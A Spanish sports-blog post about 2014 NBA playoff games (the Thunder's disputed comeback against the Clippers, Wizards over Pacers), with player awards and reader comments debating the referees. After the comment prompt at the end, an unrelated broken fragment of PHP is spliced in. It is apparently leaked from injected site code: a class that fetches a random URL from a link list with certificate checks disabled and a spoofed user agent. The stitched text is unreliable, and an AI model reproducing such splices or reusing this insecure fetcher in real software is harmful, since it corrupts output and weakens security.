La Crónica: Factor campo

14 de May de 2014 por TheDeerHunter

Increíble la victoria, y quién sabe si la serie, que se les escapó anoche a los Clippers. Con el antecedente de la épica remontada que habíamos presenciado el partido anterior los Thunder se habían mostrado intermitentemente bloqueados durante el choque, tal vez psicológicamente afectados por la situación que ellos mismos habían generado. Exceptuando la nula aportación de DeAndre Jordan, con constantes problemas de faltas, los Clippers se habían mostrado superiories. En “tiempo real” pensaba calificar el partido como el de la consagración de Blake Griffin, más líder que nunca, con Paul y Crawford más erráticos que habitualmente.

Cuando el equipo local mñas lo necesitaba volvió la polémica al Chesapeake Arena y no sólo por los típicos +20 tiros libres que disfrutaron los Thunder sobre sus rivales. Los 11 de ventaja que sumó Jamal Crawford a falta de 4 minutos no eran suficientes, ni siquiera el canastón de CP3 que ponía los Clippers 5 arriba con 49 segundos restantes. A partir de aquí se sucedieron extrañas decisiones arbitrales: posible falta en el robo de Westbrook a Paul a 15 segundos del final con dos arriba para Clippers, un balón para Thunder cuando el último en tocarla había sido Reggie Jackson, una falta al triple con los protagonistas cambiados que seguramente sólo vieron los colegiados, y para terminar la dudosa jugada defensiva de Serge Ibaka para ganar (104-105). Y es alucinante cómo se lo está pasando el español en esta serie, lo que le está dando a Griffin (ex: 1, 2). Algunos ni se lo creían. Todo sea por el espectáculo.

Antes de todo esto los Pacers volvieron por sus fueros y sufrieron un colapso ofensivo de “segunda B”. Maquillaje en el último pero en los tres primeros cuartos firmaron una proyección de mucho menos de 80 puntos. Tampoco mencionamos el abuso bajo tableros. Wall y Gortat, por su parte hicieron trizas los sistemas defensivos de Vogel (102-79). La serie, contra todo pronóstico, vuelve a Washington. Nada sabemos de qué versión encontraremos de los líderes del Este.

PREMIOS

MVP: Brutalísimo partido del polaco Marcin Gortat que dio ninguna opción a los interiores de los Pacers. Acabó el partido con 31 puntos (13 de 15 en TC) y 16 rebotes. Cuando se sentó en el último cuarto había cogido más rebotes que todos sus rivales juntos. Enorme partido también de Russell Westbrook que no soló anotó 38 puntos, cogió 5 rebotes y repartió 6 asistencias sinó que anotó los 3 tiros libres consecutivos que a la postre dieron la victoria a los suyos. Nervios de acero.

Rookie: Apartado ‘Steve Adams‘ más bien. Sigue sólido el neozelandés con 9 puntos, 4 rebotes y 2 tapones en 23 minutos.

Sorpresa: Buen partido de Matt Barnes (16p – 10r – 2t) tanto en su defensa sobre Durant como en ataque. 

Decepción: Los Wizards capturaron 62 rebotes por solo 23 de los Pacers. Alguién no salió con la intensidad que requería un partido de playoffs.

Esfuerzo en vano: A Blake Griffin (24p – 17r) se le debió quedar cara de tonto tras la improbable remontada de los Thunder en los últimos minutos. Tanto esfuerzo para nada.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Increíble final de partido de Paul, para mal.

    2 pérdidas y 1 falta de 3TL en los últimos 17 segundos, y dos faltas no pitadas a Jackson y a Durant, toca a ambos claramente. El robo de Westbrook es limpísimo, mete muy bien la mano, cree que va a hacerle falta y se encuentra el robo.

    Luego, tras la falta de 3TL, sale corriendo con los brazos en alto, saltando, da un golpe en la mesa… pero no le pitan técnica, ya pudo dar gracias. La falta es clara, codo derecho. Qué sangre fría Westbrook metiendo los 3 TL.

    Y en la última jugada, Paul intenta un caño a Ibaka… pero es que aunque el balón hubiera pasado, estaba Westbrook detrás, antes de que pudiera llegar a Griffin…

    En fin, le pudo la presión o no sé, tantos errores consecutivos en 20 segundos no son normales, y pudo ser más grave de haberle pitado la técnica o alguna de las faltas que le hace a Durant y a Jackson.

      Citar

  2. Jose Luis dice:
    #2

    No era Westbrook, era Sefolosha quien está con Griffin.

      Citar

  3. futurman dice:
    #3

    Lo siento Jose Luis pero no estoy de acuerdo con tus comentarios. Los arbitros perjudicaron claramente a Clippers durante todo el encuentro. Vale que CP la cagase un par de veces al final, pero a esa situación se llega por los cientos de libres que tiraron los otros.

      Citar

  4. Jose Luis dice:
    #4

    Yo no vi el partido, solo el resumen 🙂 del resto no puedo opinar.

    También en el resumen he visto cantidad de jugadas canasta y tiro libre de Crawford, que algunas se las dan como se las dan a Harden, por el nombre.

      Citar

  5. Esteban dice:
    #5

    bueno un partido malo de Paul, luego de varios partidos geniales creo que se puede perdonar no? no olvidemos quien gano el juego 1

      Citar

  6. Jose Luis dice:
    #6

    “Extrañas decisiones arbitrales en el robo de Westbrook al propio “mejor base del mundo” a 15 segundos del final, con dos arriba, una falta al triple con los protagonistas cambiados que seguramente sólo vieron los colegiados, y para terminar la dudosa jugada defensiva de Ibaka para ganar.”

    Yo veo correctas todas las decisiones. El robo es claro, mete la mano genial Westbrook. Los tres tiros libres también veo claramente como le da en el codo. No le pitan técnica a Paul, aunque a Lowry si se la pitaron hace poco por algo menos escandaloso. Y luego la de Ibaka, puede pitarse pie, pero no veo intención de cortar pase. De todas formas, es la que más dudas me genera.

      Citar

  7. Jose Luis dice:
    #7

    Ni siquiera fue un mal partido Esteban, solo fueron esos 30 segundos. Lo único es que fueron claves. Pero como bien dices, hizo un genial juego 1 y está jugando muy bien toda la serie, sin duda.

      Citar

  8. Esteban dice:
    #8

    no vi todo el partido pero el resumen marca un enormisimo cierre de tercer cuarto para Crawford, digo por lo que mencionas que estaba muy erratico, mas que de costumbre

      Citar

  9. Esteban dice:
    #9

    Jose Luis:
    Yo veo correctas todas las decisiones. El robo es claro, mete la mano genial Westbrook. Los tres tiros libres también veo claramente como le da en el codo. No le pitan técnica a Paul, aunque a Lowry si se la pitaron hace poco por algo menos escandaloso. Y luego la de Ibaka, puede pitarse pie, pero no veo intención de cortar pase. De todas formas, es la que más dudas me genera.

    comparto, vi las decisiones concretas no tanto el desarrollo del juego, donde quiza si pueden haber influido los jueces, pero en las puntuales no hay nada que reprochar, tanto el robo fue legitimo, como ela falta en el tiro de 3

    luego se puede discutir si en minutos finales, esos robos siempre se cobra foul o si nunca se cobra foul en el ultimo tiro de 3, pero eso hace mas a la costumbre que a si en verdad las decisiones fueron acertadas (a George frente al Heat le dieron los 3 libres en el juego 1 del año pasado)

    para el caso CP3 se salva de una técnica cantada en la ante ultima jugada

      Citar

  10. txusma dice:
    #10

    Yo creo q de todas las polémicas la más clara es la jugada que llega tras el robo de Westbrook a Paul. Los árbitros pitan fuera y se la conceden a los Thunder cuando Barnes no la toca en ningún momento.

      Citar

  11. Jose Luis dice:
    #11

    txusma:
    Yo creo q de todas las polémicas la más clara es la jugada que llega tras el robo de Westbrook a Paul. Los árbitros pitan fuera y se la conceden a los Thunder cuando Barnes no la toca en ningún momento.

    Tampoco lo tengo claro Txusma, puede ser. De todas formas debió pitarse falta de Paul y de Barnes después.

    Aquí en el minuto 1:47, parece claro que sí que toca Barnes, y Jackson no vuelve a tocar la bola, ya lleva el impulso

    http://www.nba.com/video/channels/tnt_overtime/2014/05/14/20140513-best-inside-blown-call-lac.nba/index.html?ls=iref:nbahpt13a

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>